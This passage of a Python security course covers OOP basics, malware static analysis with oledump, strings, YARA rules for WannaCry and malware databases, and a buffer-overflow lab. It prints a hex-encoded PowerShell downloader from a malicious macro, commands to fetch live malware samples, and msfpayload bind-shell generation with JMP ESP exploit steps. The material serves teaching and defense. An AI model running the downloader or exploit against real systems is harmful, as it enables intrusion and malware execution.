4918.    def crawling(self, speed):
4919.        print("Crawling at %s" % speed)
4920.  
4921.  
4922.    def scanning(self, speed):
4923.        print("Scanning at %s" % speed)
4924. -----------------------------------------------------------------------
4925.  
4926.  
4927. Creating a class looks a lot like creating a function. Instead of def you use the keyword, class. Then, you give it a name, just like you would a function. It also has parenthesis like a function, but they don't work the way you think. For a class the parenthesis allow it to extend an existing class. Don't worry about this right now, just understand that you have to put object there because it's the base of all other classes.
4928.  
4929. From there, you can see a bunch of familiar things that you'd see floating around any Python program, variables and functions. There are a series of variables with information about the scanner and a couple of methods(functions) describing what the scanner can do. You can see that each of the methods takes two parameters, self and speed. You can see that "speed" is used in the methods to print out how fast the scanner is scanning, but "self" is different.
4930.  
4931.  
4932. *****************
4933. * What is Self? *
4934. *****************
4935.  
4936. Alright, so "self" is the biggest quirk in the way that Python handles Object Oriented Programming. In most languages, classes and objects are just aware of their variables in their methods. Python needs to be told to remember them. When you pass "self" to a method, you are essentially passing that object to its method to remind it of all of the variables and other methods in that object. You also need to use it when using variables in methods. For example, if you wanted to output the model of the scanner along with the speed, it looks like this.
4937.  
4938. ---------------------------Type This-----------------------------------
4939.  
4940. print("Your %s is crawling at %s" % (self.model, speed))
4941. -----------------------------------------------------------------------
4942.  
4943. It's awkward and odd, but it works, and it's really not worth worrying about. Just remember to include "self" as the first parameter of your methods and "self." in front of your variables, and you'll be alright.
4944.  
4945.  
4946. *****************
4947. * Using A Class *
4948. *****************
4949.  
4950.  
4951. You're ready to start using the WebVulnScanner class. Create a new Python file and paste the class in. Below, you can create an object using it. Creating, or instantiating, an object in Python looks like the line below.
4952. ---------------------------Type This-----------------------------------
4953.  
4954. myscanner = WebVulnScanner()
4955. -----------------------------------------------------------------------
4956.  
4957.  
4958. That's it. To create a new object, you just have to make a new variable and set it equal to class that you are basing your object on.
4959.  
4960. Get your scanner object to print out its make and model.
4961. ---------------------------Type This-----------------------------------
4962.  
4963. print("%s %s" % (myscanner.make, myscanner.model))
4964. -----------------------------------------------------------------------
4965.  
4966. The use of a . between an object and its internal components is called the dot notation. It's very common in OOP. It works for methods the same way it does for variables.
4967. ---------------------------Type This-----------------------------------
4968.  
4969. myscanner.scanning('10req/sec')
4970. -----------------------------------------------------------------------
4971.  
4972. What if you want to change the profile of your scanning? You can definitely do that too, and it works just like changing the value of any other variable. Try printing out the profile of your scanner first. Then, change the profile, and print it out again.
4973. ---------------------------Type This-----------------------------------
4974.  
4975. print("The profile of my scanner settings is %s" % myscanner.profile)
4976. myscanner.profile = "default"
4977. print("The profile of my scanner settings is %s" % myscanner.profile)
4978. -----------------------------------------------------------------------
4979.  
4980. Your scanner settings are default now. What about a new WebVulnScanner? If you made a new scanner object, would the scanning profile be default? Give it a shot.
4981. ---------------------------Type This-----------------------------------
4982.  
4983. mynewscanner = WebVulnScanner()
4984. print("The scanning profile of my new scanner is %s" % mynewscanner.profile)
4985. -----------------------------------------------------------------------
4986.  
4987. That one's high risk. New objects are copied from the class, and the class still says that the profile is high risk. Objects exist in the computer's memory while a program is running. When you change the values within an object, they are specific to that object as it exists in memory. The changes won't persist once the program stops and won't change the class that it was created from.
4988.  
4989.  
4990. #########################################
4991. # The self variable in python explained #
4992. #########################################
4993.  
4994. So lets start by making a class involving the self variable.
4995.  
4996. A simple class :
4997.  
4998. So here is our class:
4999. ---------------------------Paste This-----------------------------------
5000.  
5001. class port(object):
5002.    open = False
5003.    def open_port(self):
5004.        if not self.open:
5005.            print("port open")
5006.  
5007. -----------------------------------------------------------------------
5008.  
5009. First let me explain the above code without the technicalities. First of all we make a class port. Then we assign it a property “open” which is currently false. After that we assign it a function open_port which can only occur if “open” is False which means that the port is open.
5010.  
5011. Making a Port:
5012.  
5013. Now that we have made a class for a Port, lets actually make a port:
5014. ---------------------------Type This-----------------------------------
5015.  
5016. x = port()
5017. -----------------------------------------------------------------------
5018.  
5019. Now x is a port which has a property open and a function open_port. Now we can access the property open by typing:
5020. ---------------------------Type This-----------------------------------
5021.  
5022. x.open
5023. -----------------------------------------------------------------------
5024.  
5025. The above command is same as:
5026. ---------------------------Type This-----------------------------------
5027.  
5028. port().open
5029. -----------------------------------------------------------------------
5030.  
5031. Now you can see that self refers to the bound variable or object. In the first case it was x because we had assigned the port class to x whereas in the second case it referred to port(). Now if we have another port y, self will know to access the open value of y and not x. For example check this example:
5032. ---------------------------Type This-----------------------------------
5033.  
5034. >>> x = port()
5035. >>> x.open
5036. False
5037. >>> y = port()
5038. >>> y.open = True
5039. >>> y.open
5040. True
5041. >>> x.open
5042. False
5043.  
5044. -----------------------------------------------------------------------
5045. The first argument of every class method, including init, is always a reference to the current instance of the class. By convention, this argument is always named self. In the init method, self refers to the newly created object; in other class methods, it refers to the instance whose method was called. For example the below code is the same as the above code.
5046.  
5047. ---------------------------Paste This-----------------------------------
5048.  
5049. class port(object):
5050.    open = False
5051.    def open_port(this):
5052.        if not this.open:
5053.            print("port open")
5054.  
5055. -----------------------------------------------------------------------
5056.  
5057.  
5058.  
5059.  
5060.  
5061.  
5062. ##################################
5063. # Day 3 Homework videos to watch #
5064. ##################################
5065. Here is your first set of youtube videos that I'd like for you to watch:
5066. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30)
5067.  
5068.  
5069.  
5070.  
5071.  
5072.  
5073.  
5074.  
5075.  
5076.  
5077.  
5078.  
5079.                            #######################################
5080. ----------- ############### # Day 4: Malware analysis with Python # ############### -----------
5081.                            #######################################
5082.  
5083.  
5084. ###############################
5085. # Lesson 28: Malware Analysis #
5086. ###############################
5087.  
5088.  
5089.  
5090.  
5091. ################
5092. # The Scenario #
5093. ################
5094. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
5095.  
5096.  
5097. The fastest thing you can do is perform static analysis.
5098. ---------------------------Type This-----------------------------------
5099.  
5100. sudo pip install olefile
5101.     infosecaddicts
5102.  
5103. mkdir ~/Desktop/oledump
5104.  
5105. cd ~/Desktop/oledump
5106.  
5107. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
5108.  
5109. unzip oledump_V0_0_22.zip
5110.  
5111. wget http://45.63.104.73/064016.zip
5112.  
5113. unzip 064016.zip
5114.     infected
5115.  
5116. python oledump.py 064016.doc
5117.  
5118. python oledump.py 064016.doc -s A4 -v
5119. -----------------------------------------------------------------------
5120.  
5121. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
5122. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
5123.  
5124. ---------------------------Type This-----------------------------------
5125.  
5126. python oledump.py 064016.doc -s A5 -v
5127. -----------------------------------------------------------------------
5128.  
5129. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
5130.  
5131. ---------------------------Type This-----------------------------------
5132.  
5133. python oledump.py 064016.doc -s A3 -v
5134. -----------------------------------------------------------------------
5135.  
5136. - Look for "GVhkjbjv" and you should see:
5137.  
5138. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
5139.  
5140. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
5141. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
5142.  
5143.  
5144.  
5145. ###################
5146. # Static Analysis #
5147. ###################
5148.  
5149. - After logging please open a terminal window and type the following commands:
5150. ---------------------------Type This-----------------------------------
5151.  
5152. cd Desktop/
5153.  
5154. wget http://45.63.104.73/wannacry.zip
5155.  
5156. unzip wannacry.zip
5157.     infected
5158.  
5159. file wannacry.exe
5160.  
5161. mv wannacry.exe malware.pdf
5162.  
5163. file malware.pdf
5164.  
5165. mv malware.pdf wannacry.exe
5166.  
5167. hexdump -n 2 -C wannacry.exe
5168.  
5169. -----------------------------------------------------------------------
5170.  
5171.  
5172.  
5173. ***What is '4d 5a' or 'MZ'***
5174. Reference:
5175. http://www.garykessler.net/library/file_sigs.html
5176.  
5177.  
5178.  
5179. ---------------------------Type This-----------------------------------
5180.  
5181.  
5182. objdump -x wannacry.exe
5183.  
5184. strings wannacry.exe
5185.  
5186. strings --all wannacry.exe | head -n 6
5187.  
5188. strings wannacry.exe | grep -i dll
5189.  
5190. strings wannacry.exe | grep -i library
5191.  
5192. strings wannacry.exe | grep -i reg
5193.  
5194. strings wannacry.exe | grep -i key
5195.  
5196. strings wannacry.exe | grep -i rsa
5197.  
5198. strings wannacry.exe | grep -i open
5199.  
5200. strings wannacry.exe | grep -i get
5201.  
5202. strings wannacry.exe | grep -i mutex
5203.  
5204. strings wannacry.exe | grep -i irc
5205.  
5206. strings wannacry.exe | grep -i join        
5207.  
5208. strings wannacry.exe | grep -i admin
5209.  
5210. strings wannacry.exe | grep -i list
5211.  
5212.  
5213.  
5214. -----------------------------------------------------------------------
5215.  
5216.  
5217.  
5218.  
5219.  
5220.  
5221.  
5222.  
5223. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
5224.  
5225. Quick Google search for "wannacry ransomeware analysis"
5226.  
5227.  
5228. Reference
5229. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
5230.  
5231. - Yara Rule -
5232.  
5233.  
5234. Strings:
5235. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
5236. $s2 = “Wanna Decryptor” wide ascii nocase
5237. $s3 = “.wcry” wide ascii nocase
5238. $s4 = “WANNACRY” wide ascii nocase
5239. $s5 = “WANACRY!” wide ascii nocase
5240. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
5241.  
5242.  
5243.  
5244.  
5245.  
5246.  
5247.  
5248.  
5249. Ok, let's look for the individual strings
5250.  
5251. ---------------------------Type This-----------------------------------
5252.  
5253.  
5254. strings wannacry.exe | grep -i ooops
5255.  
5256. strings wannacry.exe | grep -i wanna
5257.  
5258. strings wannacry.exe | grep -i wcry
5259.  
5260. strings wannacry.exe | grep -i wannacry
5261.  
5262. strings wannacry.exe | grep -i wanacry          **** Matches $s5, hmmm.....
5263.  
5264.  
5265. -----------------------------------------------------------------------
5266.  
5267.  
5268.  
5269.  
5270.  
5271. ####################################
5272. # Tired of GREP - let's try Python #
5273. ####################################
5274. Decided to make my own script for this kind of stuff in the future. I
5275.  
5276. Reference1:
5277. http://45.63.104.73/analyse_malware.py
5278.  
5279. This is a really good script for the basics of static analysis
5280.  
5281. Reference:
5282. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
5283.  
5284.  
5285. This is really good for showing some good signatures to add to the Python script
5286.  
5287.  
5288. Here is my own script using the signatures (started this yesterday, but still needs work):
5289. https://pastebin.com/guxzCBmP
5290.  
5291.  
5292. ---------------------------Type This-----------------------------------
5293.  
5294.  
5295. sudo apt install -y python-pefile
5296.     infosecaddicts
5297.  
5298.  
5299.  
5300. wget https://pastebin.com/raw/guxzCBmP
5301.  
5302.  
5303. mv guxzCBmP am.py
5304.  
5305.  
5306. vi am.py
5307.  
5308. python am.py wannacry.exe
5309.  
5310.  
5311. -----------------------------------------------------------------------
5312.  
5313.  
5314.  
5315.  
5316.  
5317.  
5318.  
5319.  
5320. ##############
5321. # Yara Ninja #
5322. ##############
5323. ---------------------------Type This-----------------------------------
5324.  
5325. cd ~/Desktop
5326.  
5327. sudo apt-get remove -y yara
5328.     infosecaddcits
5329.  
5330. sudo apt -y install libtool
5331.     infosecaddicts
5332.  
5333. wget https://github.com/VirusTotal/yara/archive/v3.6.0.zip
5334.  
5335.  
5336. unzip v3.6.0.zip
5337.  
5338. cd yara-3.6.0
5339.  
5340. ./bootstrap.sh
5341.  
5342. ./configure
5343.  
5344. make
5345.  
5346. sudo make install
5347.    infosecaddicts
5348.  
5349. yara -v
5350.  
5351. cd ~/Desktop
5352.  
5353.  
5354. -----------------------------------------------------------------------
5355.  
5356.  
5357. NOTE:
5358. McAfee is giving these yara rules - so add them to the hashes.txt file
5359.  
5360. Reference:
5361. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
5362.  
5363. ----------------------------------------------------------------------------
5364. rule wannacry_1 : ransom
5365. {
5366.    meta:
5367.        author = "Joshua Cannell"
5368.        description = "WannaCry Ransomware strings"
5369.        weight = 100
5370.        date = "2017-05-12"
5371.  
5372.    strings:
5373.        $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
5374.        $s2 = "Wanna Decryptor" wide ascii nocase
5375.        $s3 = ".wcry" wide ascii nocase
5376.        $s4 = "WANNACRY" wide ascii nocase
5377.        $s5 = "WANACRY!" wide ascii nocase
5378.        $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
5379.  
5380.    condition:
5381.        any of them
5382. }
5383.  
5384. ----------------------------------------------------------------------------
5385. rule wannacry_2{
5386.    meta:
5387.        author = "Harold Ogden"
5388.        description = "WannaCry Ransomware Strings"
5389.        date = "2017-05-12"
5390.        weight = 100
5391.  
5392.    strings:
5393.        $string1 = "msg/m_bulgarian.wnry"
5394.        $string2 = "msg/m_chinese (simplified).wnry"
5395.        $string3 = "msg/m_chinese (traditional).wnry"
5396.        $string4 = "msg/m_croatian.wnry"
5397.        $string5 = "msg/m_czech.wnry"
5398.        $string6 = "msg/m_danish.wnry"
5399.        $string7 = "msg/m_dutch.wnry"
5400.        $string8 = "msg/m_english.wnry"
5401.        $string9 = "msg/m_filipino.wnry"
5402.        $string10 = "msg/m_finnish.wnry"
5403.        $string11 = "msg/m_french.wnry"
5404.        $string12 = "msg/m_german.wnry"
5405.        $string13 = "msg/m_greek.wnry"
5406.        $string14 = "msg/m_indonesian.wnry"
5407.        $string15 = "msg/m_italian.wnry"
5408.        $string16 = "msg/m_japanese.wnry"
5409.        $string17 = "msg/m_korean.wnry"
5410.        $string18 = "msg/m_latvian.wnry"
5411.        $string19 = "msg/m_norwegian.wnry"
5412.        $string20 = "msg/m_polish.wnry"
5413.        $string21 = "msg/m_portuguese.wnry"
5414.        $string22 = "msg/m_romanian.wnry"
5415.        $string23 = "msg/m_russian.wnry"
5416.        $string24 = "msg/m_slovak.wnry"
5417.        $string25 = "msg/m_spanish.wnry"
5418.        $string26 = "msg/m_swedish.wnry"
5419.        $string27 = "msg/m_turkish.wnry"
5420.        $string28 = "msg/m_vietnamese.wnry"
5421.  
5422.  
5423.    condition:
5424.        any of ($string*)
5425. }
5426. ----------------------------------------------------------------------------
5427.  
5428.  
5429. #######################
5430. # External DB Lookups #
5431. #######################
5432.  
5433. Creating a malware database (sqlite)
5434. ---------------------------Type This-----------------------------------
5435.  
5436. sudo apt install -y python-simplejson python-simplejson-dbg
5437.    infosecaddicts
5438.  
5439.  
5440.  
5441. wget https://raw.githubusercontent.com/mboman/mart/master/bin/avsubmit.py
5442.  
5443.  
5444.  
5445. python avsubmit.py -f wannacry.exe -e
5446.  
5447. ----------------------------------------------------------------------------
5448.  
5449. Analysis of the file can be found at:
5450. http://www.threatexpert.com/report.aspx?md5=84c82835a5d21bbcf75a61706d8ab549
5451.  
5452.  
5453.  
5454.  
5455.  
5456.  
5457.  
5458.  
5459.  
5460. ###############################
5461. # Creating a Malware Database #
5462. ###############################
5463. Creating a malware database (mysql)
5464. -----------------------------------
5465. - Step 1: Installing MySQL database
5466. - Run the following command in the terminal:
5467. ---------------------------Type This-----------------------------------
5468.  
5469. sudo apt install -y mysql-server
5470.     infosecaddicts
5471.    
5472. - Step 2: Installing Python MySQLdb module
5473. - Run the following command in the terminal:
5474.  
5475. sudo apt-get build-dep python-mysqldb
5476.     infosecaddicts
5477.  
5478. sudo apt install -y python-mysqldb
5479.     infosecaddicts
5480.  
5481. Step 3: Logging in
5482. Run the following command in the terminal:
5483.  
5484. mysql -u root -p                    (set a password of 'malware')
5485.  
5486. - Then create one database by running following command:
5487.  
5488. create database malware;
5489.  
5490. exit;
5491.  
5492. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
5493.  
5494. vi mal_to_db.py                     (fill in database connection information)
5495.  
5496. python mal_to_db.py -i
5497.  
5498. ------- check it to see if the files table was created ------
5499.  
5500. mysql -u root -p
5501.    malware
5502.  
5503. show databases;
5504.  
5505. use malware;
5506.  
5507. show tables;
5508.  
5509. describe files;
5510.  
5511. exit;
5512.  
5513. -----------------------------------------------------------------------
5514.  
5515.  
5516. - Now add the malicious file to the DB
5517. ---------------------------Type This-----------------------------------
5518.  
5519.  
5520. python mal_to_db.py -f wannacry.exe -u
5521.  
5522. -----------------------------------------------------------------------
5523.  
5524.  
5525. - Now check to see if it is in the DB
5526. --------------------------Type This-----------------------------------
5527.  
5528. mysql -u root -p
5529.    malware
5530.  
5531. mysql> use malware;
5532.  
5533. select id,md5,sha1,sha256,time FROM files;
5534.  
5535. mysql> quit;
5536.  
5537. -----------------------------------------------------------------------
5538.  
5539.  
5540.  
5541. ######################################
5542. # PCAP Analysis with forensicPCAP.py #
5543. ######################################
5544. ---------------------------Type This-----------------------------------
5545.  
5546. cd ~/Desktop
5547. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
5548. sudo easy_install cmd2
5549.  
5550. python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
5551.  
5552. ForPCAP >>> help
5553.  
5554.  
5555. Prints stats about PCAP
5556. ForPCAP >>> stat
5557.  
5558.  
5559. Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
5560. ForPCAP >>> dns
5561.  
5562. ForPCAP >>> show
5563.  
5564.  
5565. Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
5566. ForPCAP >>> dstports
5567.  
5568. ForPCAP >>> show
5569.  
5570.  
5571. Prints the number of ip source and store them.
5572. ForPCAP >>> ipsrc
5573.  
5574.  
5575. Prints the number of web's requests and store them
5576. ForPCAP >>> web
5577.  
5578.  
5579. Prints the number of mail's requests and store them
5580. ForPCAP >>> mail
5581.  
5582. -----------------------------------------------------------------------
5583.  
5584.  
5585.  
5586.  
5587.  
5588.  
5589. ##################################
5590. # Day 4 Homework videos to watch #
5591. ##################################
5592. Here is your first set of youtube videos that I'd like for you to watch:
5593. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40)
5594.  
5595.  
5596.  
5597.  
5598.  
5599.  
5600.  
5601.  
5602.  
5603.  
5604.                            ##########################################
5605. ----------- ############### # Day 4: Debugger automation with Python # ############### -----------
5606.                            ##########################################
5607.  
5608. In this lab we are going to exploit the bufferoverflow in the program which is a simple tcp server using the strcpy in its code. Download the server's .exe file from here http://code.securitytube.net/Server-Strcpy.exe
5609.  
5610. Run the server on windows machine.
5611.  
5612. Connect to the server from an ubuntu machine using nc <ip-adress of windows> 10000. Send some character from there and see if it returns the same.
5613.  
5614.  
5615.  
5616. It's a simple echo server. Reflects whatever you type in the input we send to this program, is stored using strcpy.  Let us write a simple python program that sends a large input to the program and see if it can handle large inputs.
5617. ---------------------------Type This-----------------------------------
5618.  
5619. vim strcpy.py
5620.  
5621. ./strcpy <server adress>
5622.  
5623. -----------------------------------------------------------------------
5624.  
5625.  
5626. On the server machine see if the server crashes and what error it shows.
5627.  
5628. Now let's find out what happens behind the scenes when you run the python script against your echo server. When you do not have the source code of the program that you need to debug, the only way to do so is to take the binary, disassemble and debug it to actually see what is happening. The immunity debugger is the tool which does all that.
5629.  
5630. Open the server.exe file in immunity debugger. It will show information about the binary in different sections including Registers [EIP, ESP, EBP, etc], the machine language equivalent and addresses of the binary with their values.
5631.  
5632. Now press the run button and the binary will be in the “Running” state. Execute the strcpy.py script as done previously. The binary will crash again and immunity debugger will show it in “Paused” State. It will also show the stack with its values and ASCII equivalent which is seen as “AAAA...” as all the characters sent from the script are As, as shown in the figure below.
5633.  
5634.  
5635. We can also write python scripts using the python shell provided by the Immunity Debugger. The scripts we write here need to be placed in “C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands” directory, which will be automatically made available to immunity debugger at run-time.
5636.  
5637.  
5638. Now open the python shell, Create “New Window” and save it as spse-demo in the PyCommands directory mentioned above.
5639.  
5640.  
5641.  
5642. In order to leverage the rich set of APIs that Immunity provides, import the immlib which ships with the Immunity framework. At this instance write a simple script that simply prints hello in the main method. To run the script write the name of the script preceded by the exclamation mark e.g !spse-demo. You can also write to the Log window by:
5643. imm.log(“Anything to log”)
5644.  
5645. Now the problem with the debugger is that it prints all the messages at the end of the script execution, which is quite hectic if you are writing a long script which requires incremental updates. To serve the purpose use imm.updateLog() method so that the Log is updated instantly.
5646.  
5647. Our command will also be visible in the List of PyCommands  which are available in the Immunity.
5648.  
5649.  
5650. To run a process we need to open the process in Immunity Debugger and run it as shown earlier, what if we want to run the same process programmatically.
5651.  
5652. Create a new python script naming spse-pro.py similarly as in the previous example. Open the process by imm.openProcess(“path to the binary”) e.g my binary was C:\Server-Strcpy.exe
5653.  
5654.  
5655. Similarly, you can attach the Immunity Debugger to an already running process by the imm.Attach(pid) method.
5656.  
5657. Now inside a running process we need to get a list of modules, and for each of these modules we need to get a set of properties like Name, Base Address, Entry Point, and Size of that process. Useful methods are getAllModules and its child methods which are elaborated in the Immunity's online documentation.
5658.  
5659.  
5660.  
5661.  
5662. Now we will use the Immunity Debugger to actually exploit the buffer overflow.
5663.  
5664. As we know the stack grows from high-memory to low-memory. When we send a large buffer to our program/binary the return address is over-written, the EIP ends up with a garbage value and the program crashed. The idea is to specially craft the buffer in a way to over-write the return address with a chosen value, which is the payload we want to execute on that machine.
5665.  
5666. To start, we'll revisit our old python script and a metasploit utility patter_creat.rb to create a random pattern of 500 characters.
5667.  
5668.  
5669.  
5670. Place this pattern in the python attack script, run the server in the Immunity, run the attack script. See that the binary has crashed and the EIP is populated with the value 6A413969. Now we need to find at which offset this value is in our pattern, pattern_offset.rb will server the purpose.
5671.  
5672.  
5673.  
5674. From this we know the value from offset 268 precisely corrupts the EIP. Meaning we really don't care about the first 268 bytes of the buffer, what we need to focus is the return address.
5675.  
5676. Now next to EIP there is ESP register, we will populate the ESP with our payload and place a jump ESP instruction in the EIP register. The OPCode for the JUMP ESP instruction is 71AB7BFB, which we will append to our buffer in reverse order, as the bytes are stored in reverse order in stack. For payload we use metsploit to generate our payload and encode it for x86 architecture. Following command will suffice
5677.  
5678. ---------------------------Type This-----------------------------------
5679.  
5680. msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b “\x90” -t c
5681. -----------------------------------------------------------------------
5682.  
5683. This will generate a payload, append it to the buffer and run the script again.